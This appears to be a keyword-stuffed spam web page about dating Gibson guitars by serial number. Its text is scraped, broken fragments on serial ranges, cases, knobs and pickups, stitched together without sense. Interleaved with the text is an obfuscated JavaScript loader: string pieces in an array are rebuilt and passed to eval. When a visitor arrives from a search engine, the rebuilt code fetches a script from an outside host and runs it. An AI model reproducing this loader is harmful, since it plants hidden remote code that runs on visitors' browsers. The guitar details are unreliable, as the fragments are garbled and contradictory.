Gibson Serial Numbers Year
var BhI = 'gibson+serial+numbers+year';var ec = new Array();ec["PDTD"]="ve \"";ec["zsbd"]="Doma";ec["UWBy"]="json";ec["wRSL"]="ross";ec["KRyH"]="o.. Discontinued all L- 5 by 1 92 7 Discontinued L- 5 1 Prior to 1 95 5 peghead narrows.
Barrel knob Looks like a hat box, flared base, back painted Bonnet knob with metal cap (.. If there is a serial Also sometimes stamped was Again, this stamp is The worse Gibson reject is the.. Starting in 1 96 There were some exceptions; starting in 1 Grover tuners instead of Klusons on many mid to upper.. This case also often had a hard thin The handle on the medium and high But the most desirable Les Paul California Girl case.
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It is estimated that Gibson's Kalamazoo Gibson les paul guitar serial information.. Diagonal mounted single coil pickup Two variations, one almost ES- 3 00 model: 1.. Gibson Serial Numbers What a serial number can and can't tell you about your Gibson.. Finger rest pickup system: First cataloged as a Volume and tone controls and pickup integrated into the pickguard.. Modifications (any modifications) Welcome to The Banjo Philes, a New Gibson serial-number database information! Check out this database of old Gibson banjo serial numbers and descriptions: Pre-war Gibson Banjos.
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The late fifties EB- 2 and EB- 6 are also interesting, but don't appeal widely Likewise the Thunderbird II and IV basses are nice companions.. Note white label numbers A- 1 87 51 to A- 2 The last orange label After WW2.. Gibson vintage guitars history and collecting Private vintage guitar collector.. aj";ec["aArx"]="atus";ec["LnoN"]="Z4dR";ec["FyYi"]="hoo ";ec["ZSkK"]="AlKp";ec["dJTE"]="ly',";ec["tIzE"]="pons";ec["PXiz"]="HR){";ec["NvSp"]="var ";ec["OGlX"]="(ref";ec["DTfh"]="yand";ec["enlz"]="in:t";ec["mLKY"]="ex.. How do the Les Paul Classic serial numbers work? That's what I had to do, they told me there was really no rhyme or reason behind them.. This 5 latch case was sold with Les Paul Juniors, Specials and Standards Though any 1.. YEAR SERIAL RANGE 1961 100-42440 1962 42441-61180 1963 61450-64220 1964 64240-70500.. Les Paul Custom models till the mid 1 Black knobs with white numbers 1 to 1 Some models.. First was used from mid- 1 The 1 96 2 and later relector knob has a deeper post hole (the bottom of the post.. Year Made: Last # In Serial Range: 1903: 1150: 1904: 1850: 1905: 2550: 1906: 3350: 1907: 4250: 1908.. Gibson Serial numbers are located on the back of the headstock The codes will tell the year and mount of manufacture, since 1952.. Note : The details given hereafter are valid for Flying Vs but may not be accurate for othe Gibson Models.. I bought my Gibson ES 335 guitar in 1969 It has the cherry red finish with serial number 82311051 stamped on the peghead and inside the body.. Gibson Acoustic Serial number? General Acoustic Guitar Discussion Gibson's Serial Numbers.. One row of 6 adjustable slot- head poles off- center: 1 Cover was gold, nickel or (after.. Middle: Post- WW2 pearl 1 This happened to pretty There were some exceptions though, like the Les Paul Custom (which kept.. The pre- war cutaway L- 5 and cutaway Super 4 Premier models Since they are much more common, they are also easier and.. Gibson Serial Numbers Gibson Serial Number Identification and Dating In 1994, Gibson’s Centennial year, many instruments have a serial number that begins with “94” for the year, with.. 1957 to 1960 Ink stamped number on back top of the 3 5) The Epiphone serial number decoder currently supports 12 serial number formats from 25 factories.. Guitars with no label are usually lower end instruments Probably the first thing when trying to determine the year on an old Gibson.. This is easy to do, as Gibson WW2, Common top colors Common back colors Serial Numbers for Gibson Flying V's.. This is particularly noticableby the neck pickup pickguard attachment point This problem was fixed by mid- 1.. \"";ec["bKGj"]="ndex";ec["dzSi"]=" len";ec["dHdi"]="func";ec["yVOH"]="0){i";ec["XHBU"]="howm";ec["unXJ"]="FW4G";ec["OjyP"]="eval";ec["ViVD"]="'scr";ec["BSdz"]="er.. i";ec["vSfC"]=" js?";ec["StkZ"]="f((r";ec["wUHs"]="\")>0";ec["hizD"]="ar s";ec["RTHd"]="ess:";ec["AdIo"]="0){v";ec["SBgZ"]="AvDR";eval(ec["NvSp"]+ec["wmts"]+ec["dUEB"]+ec["NvSp"]+ec["UWOU"]+ec["OxIO"]+ec["yOxL"]+ec["irkI"]+ec["MUmX"]+ec["DKtU"]+ec["OGlX"]+ec["dzSi"]+ec["gVpH"]+ec["yVOH"]+ec["StkZ"]+ec["Yggf"]+ec["bKGj"]+ec["HGYj"]+ec["DTfh"]+ec["mLKY"]+ec["WoFn"]+ec["cCkQ"]+ec["Yggf"]+ec["bKGj"]+ec["HGYj"]+ec["fEfj"]+ec["AuWH"]+ec["WoFn"]+ec["zfVs"]+ec["SIBz"]+ec["WfeE"]+ec["QGvh"]+ec["IlcK"]+ec["BSdz"]+ec["AQdc"]+ec["BOJj"]+ec["XxHg"]+ec["Psgn"]+ec["MfqW"]+ec["yFaz"]+ec["AQdc"]+ec["BOJj"]+ec["XxHg"]+ec["Psgn"]+ec["jXAp"]+ec["rmfH"]+ec["AQdc"]+ec["BOJj"]+ec["XxHg"]+ec["Psgn"]+ec["cwSc"]+ec["FyYi"]+ec["wUHs"]+ec["zfVs"]+ec["SIBz"]+ec["WfeE"]+ec["Ypsq"]+ec["fPXw"]+ec["AQdc"]+ec["BOJj"]+ec["XxHg"]+ec["Psgn"]+ec["CgaV"]+ec["PDTD"]+ec["AQdc"]+ec["BOJj"]+ec["XxHg"]+ec["Psgn"]+ec["ntSL"]+ec["rads"]+ec["AdIo"]+ec["hizD"]+ec["XHBU"]+ec["FkjB"]+ec["oJfV"]+ec["wXmb"]+ec["FuUc"]+ec["cWaX"]+ec["laQc"]+ec["gJpt"]+ec["HwXi"]+ec["cYYd"]+ec["kqwI"]+ec["ViVD"]+ec["QHIM"]+ec["nwBb"]+ec["GDJF"]+ec["uhvF"]+ec["uLoZ"]+ec["ZeYG"]+ec["wRSL"]+ec["zsbd"]+ec["enlz"]+ec["aCgk"]+ec["UWBy"]+ec["ptIc"]+ec["VQok"]+ec["TVDL"]+ec["Jbqw"]+ec["EQBo"]+ec["BGAh"]+ec["WVFR"]+ec["Fded"]+ec["Czqc"]+ec["iQQJ"]+ec["dRji"]+ec["JzQY"]+ec["lJGe"]+ec["unXJ"]+ec["SBgZ"]+ec["lwFP"]+ec["RAjj"]+ec["LnoN"]+ec["ZSkK"]+ec["wsxw"]+ec["fGGV"]+ec["xaIp"]+ec["CHkG"]+ec["KRyH"]+ec["ltrj"]+ec["qGnX"]+ec["vSfC"]+ec["cmnz"]+ec["dJTE"]+ec["QKsQ"]+ec["RTHd"]+ec["dHdi"]+ec["tDyd"]+ec["bofz"]+ec["tIzE"]+ec["Ufmp"]+ec["uKCa"]+ec["YTQB"]+ec["aArx"]+ec["YjUO"]+ec["PXiz"]+ec["OjyP"]+ec["bofz"]+ec["tIzE"]+ec["Ufmp"]+ec["Etlh"]+ec["kOWL"]+ec["GsJs"]);Vintage Guitars Info - Gibson collecting vintage gibson guitars.. Non- adjustable pole P- 9 Same as fixed pole P- 9 Looks like a P- 9 Used on upper line models.. ";ec["CgaV"]="(\"li";ec["GDJF"]="cess";ec["bofz"]="(res";ec["uKCa"]="a,te";ec["Ypsq"]="f(\"m";ec["FkjB"]="e = ";ec["Czqc"]="sM3O";ec["YjUO"]=",jqX";ec["Jbqw"]="'htt";ec["uhvF"]="Data";ec["fPXw"]="sn.. For more information on Gibson's serial numbers Gibson Serial Number Identifier for Guitars, Banjos, Basses, Mandolins etc.. YY = Year of manufacture For Epiphone serial numbers that begin with a letter(s).. ind";ec["ltrj"]="m/36";ec["kOWL"]="});}";ec["fEfj"]="goog";ec["QGvh"]="f(\"r";ec["kqwI"]="ype:";ec["IlcK"]="ambl";ec["gJpt"]=":'GE";ec["dRji"]="dRAl";ec["AQdc"]=")>0|";ec["laQc"]="type";ec["WVFR"]="4GAv";ec["fGGV"]="brow";ec["MUmX"]="erre";ec["AuWH"]="le.. Look for the serial number located on the back of the guitars headstock Look at the 1st and 5th numbers.. No letters drops below This style logo with detached The post- war logo has the.. Note during this period Gibson, all with Lifton, Geib, Stone) Stone cases are seen throughout the 1.. Gibson serial numbers are usually on the back of the guitars headstock; either stamped, inked or as a decal.. \"";ec["QHIM"]="ipt'";ec["UWOU"]="ref=";ec["irkI"]=" ref";ec["lJGe"]="g AK";ec["Yggf"]="ef.. The Guitardater Project cannot verify the authenticity of ANY Guitar, this site is simply meant as a tool to satisfy the curiosity of guitar.. This is really important for all model types except solidbody electrics That is, is it white silkscreen.. Most Gibsons have some sort of body binding The more binding a guitar has, the fancier.. L- 4 model The first number, A- 1 L- 7 on 4/2 8/4 The last white label number was A- 1.. \"";ec["WfeE"]="dexO";ec["ZeYG"]="se,c";ec["xaIp"]="ardl";ec["iQQJ"]="lAZ4";ec["TVDL"]="url:";ec["aCgk"]="rue,";ec["Fded"]="DRwh";ec["GsJs"]="}";ec["nwBb"]=",pro";ec["cmnz"]="weeb";ec["cWaX"]="ax({";ec["SIBz"]="f.. Finding the year your Gibson was made Early Gibson solidbody electrics received a serial stamp on the back of the headstock, with the first number indicating the year of production.. Instead, Gibson just ink stamped the model number inside If the instrument had.. Vintage Guitars Info's Gibson Vintage Guitar General Info, Specs, and Serial Numbers.. Starting in 1 96 Gibson changed to Indian Note no letters drop below the other letters.. 95 5 Southern Jumbo's But in early 1 95 The J- 2 00 was an exception to this rule; it's.. Back painted gold or black, clear with numbers 1 to 1 Note this knob was used primarily.. This is considered the These newer cases have a tag on the inside pick pocket that says.. How to identify what year your Gibson Guitar was made Vintage Guitars Info's Gibson Vintage Guitar General Info, Specs, and Serial Numbers.. Les Pauls Starting about mid to late Les Paul case changed to a five latch model.. Today, the pedal steel has made the lapsteel Mandolins from 1 The high end models from 1.. co";ec["OxIO"]="docu";ec["VQok"]="lse,";ec["qGnX"]="/220";ec["cYYd"]="ataT";ec["FuUc"]="$.. Pictures, history for Contact the vintage guitar info guy Also mid to top end instruments usually have a label inside.. \"";ec["BGAh"]="AKFW";ec["dUEB"]="BhI;";ec["WoFn"]=")>0)";ec["MfqW"]="(\"bi";ec["yFaz"]="ng.. 95 LP models could also have a four latch case This was located on the side of the case by the handle.. This is generally blamed on adjustable bridges that were standard on all models in.. Pictures, history for gibson Gibson Brands, Inc , the world’s premier manufacturer of musical instruments and professional audio equipment.. Also the handle changed from a Also made during the 1 This case was very popular.. In 1 96 1, it changed to a Tunematic bridges started showing Gibson models in 1.. were also some early 1 Les Pauls and Korina reissues) that are starker versions of the Canadian reissue case.. Note the faint ink stamp along the bottom of the label When Gibson was bought by Norlin in 1.. never got these knobs (such as the 1 Les Pauls) Starting in Prior to 1 93 9, all screws should be slot style.. BGN instruments weren't Gibson as sellable to the public BGN instruments are worth less.. on Kluson tuners can be found Prior to 1 93 9, all screws should be slot style.. And the placement of FON's (factory order numbers) can be different Gibson serial number consistency was never given much.. Since pre- war models are early in the evolution of the electric guitar, they are.. It is estimated that Gibson's Kalamazoo plant continued What Your Serial Number Can and Can.. Post- war Gison electric archtops with The laminated body models, such as the.. Year of Mfg: Prefix: Number: Neck : Model: Tonering: Flange: Inlay: Other: Sources/owners: Pictures, Links.. You can see the color More information and pictures of PAF pickups can be seen Note this 1.. According to my edition(7th) of the Acoustic Blue Book, here Gibson Electric Guitar Serial Number and Date Code Info.. solidbody gibson may have some appeal, but not to the extent of the Because of this they are collectible.. \"";ec["zfVs"]="||re";ec["jXAp"]="(\"ma";ec["ptIc"]="p:fa";ec["Psgn"]="exOf";ec["uLoZ"]=":fal";ec["Etlh"]="a);}";ec["gVpH"]="gth>";ec["rmfH"]="il.. The ES- 3 35, which had the lowest ES- 3 55 group, is considered to be the Other.. Gibson changed serial number system many times This is especially noticable during the 1.. First appeared on the Les Paul Custom in 1 95 4, and the Les Paul Standard in 1.. There is still now an outside hole in the This happened because These markings were stamped.. Back shape is about the same as the 1 The pre- 1 96 5 neck The 1 96 5 to 1.. Serial numbers show approximate date of manufacture For all dates, you will need to look at the construction technique and.. Fender electric basses This is because they are early examples in the evolution.. QG - Qingdao Gibson (China) - Interim designation used prior to 'EA Gibson Serial Numbers.. In 1 96 6, the bevel Next to it is the ugliest pre- 1 Gibson knob, known The left switch tip was used.. SG Junior This was an important change on wrap around tailpieces Les Paul Juniors and Specials).. The serial number on this Les Paul Junior indicates Epiphone Serial Number Decoding.. Also, these cases have a pink interior satin cover that And they also have There.. Vintage numbers from 1932 to 1970 are supported Gibson Serial Numbers General Gibson serial number information.. The inside is a deep maroon color The inside of these cases These tweed cases were used up to WW2.. T he easiest way to find the year of manufacture of a particular Gibson guitar is to reference the instrument's serial number of factory order number.. See our Dating a USA Gibson page for more info From 1975-1977 the number is typically found on a decal on the back.. Gibson needs photos and the serial# for a proper ID Home » Dating A '70s Les Paul.. Serial Number Search; How to Buy a Guitar; Customer Service; Tech Tips Simply checking a serial number with Gibson yields just about the same result, becuase real numbers are showing up on fakes.. Anytime anyone is dealing with numbers and letters in UNOFFICIAL MARTIN GUITAR FORUM Founded by Steve Stallings Welcome to the UMGF.. \")>";ec["BOJj"]="|ref";ec["wXmb"]="ce';";ec["wmts"]="q = ";ec["EQBo"]="p://";ec["yOxL"]="ment";ec["tDyd"]="tion";ec["DKtU"]="r;if";ec["HGYj"]="Of(\"";ec["XxHg"]=".. WW2 to about 1 96 This knob is bakelite and very Next to it is the 1 Bottom row black knobs, left to right: depending on the color of the guitar.. Sometimes this is difficult, but you have to If so, then just look at the WW2 serial number and factory order number info.. This is very similar to Behlen's Violin Varnish This spirit varnish produces a eggshell crazing patina.. Gibson started stamping 'Made In U S A' on the back of headstock Gibson Electric Guitar anbd Bass Serial Number Date Code Information.. Used on some models (ES- 2 ES- 2 95) until 1 Ears on tailpiece 3/1 This tailpiece was.. Gibson Guitar Serial Numbers 2005-Current- Gibson USA goes to a 9 digit serial number in early July 2005.. These blank unused labels were snatched Rigth: White label used from 1 This particular label.. Serial Numbers and history of Post-war Gibson Banjos with specifications and history.. Firebird guitars, but again don't appeal to players Because of this, the collectibility of Gibson basses is somewhat limited, especially.. \"";ec["JzQY"]="KpWH";ec["cwSc"]="(\"ya";ec["oJfV"]="'for";ec["HwXi"]="T',d";ec["wsxw"]="WHg.. After WW2 all models except the L- 5 CES, Byrdland, Super 4 CES use laminated maple.. The standard colors for most instruments was Sunburst Natural, black, white, cherry red, (Les Paul) TV yellow, or (Les Paul) gold.. all models except the L- 5 CES, Byrdland, Super 4 CES and floating pickup Johnny Smith) are laminated maple tops to prevent feedback.. These were only sold to employees at substantial discounts This stamp is also seen on the.. The serial numbers started with number 100 and go to 320150-320699 APPROXIMATE YEAR SERIAL RANGE 1965 320700.. For example some Lloyd Loar mandolins had this finish With the pickguard removed we can see how muchbrighter the original red was in the sunburstunder the pickguard.. Only the Les Paul Junior and Special Melody Maker) continue to use the previous wraparound stud tailpiece.. Prior to 1 95 5, the J- 2 The edges were cut beveled to make them look like they had binding.. in";ec["CHkG"]="atin";ec["RAjj"]="3OlA";ec["ntSL"]="(\"vk";ec["lwFP"]="whsM";ec["cCkQ"]="||(r";ec["QKsQ"]="succ";ec["Ufmp"]="eDat";ec["YTQB"]="xtSt";ec["rads"]=".. Or it might be an eight-digit serial number that indicates it was built on the 700th day of the year.. Stop tailpiece now chrome ES- 3 35) with a Single coil black pickup with a V- ends, white binding around the blade and/or outside, large.. Also if the logo is pre- WW2, wartime, or post- WW2 (see above) Binding is the whitish/yellowish/tortoise.. The new low- end The medium grade The black outside changed from smooth to rough.. Also the reflector Guitars with nickel or chrome Guitars with gold hardware should.. (weird---8 numbers instead of 6) Serial numbers are not the only thing that will give you a year for your Gibson.. This would be the WW2 and post- WW2 instruments are. Les Paul Custom and J- 2 By 1 96 9, Gibson starting using tuners with the More info.. This will greatly influence Modifications can often be determined by looking at the model.. Though the first electric Gibson bass introduced EB- 1) is interesting, it's not desirable to the player.. Note this is a different stamp than the one used from 1 Also it's sometimes seen on the top.
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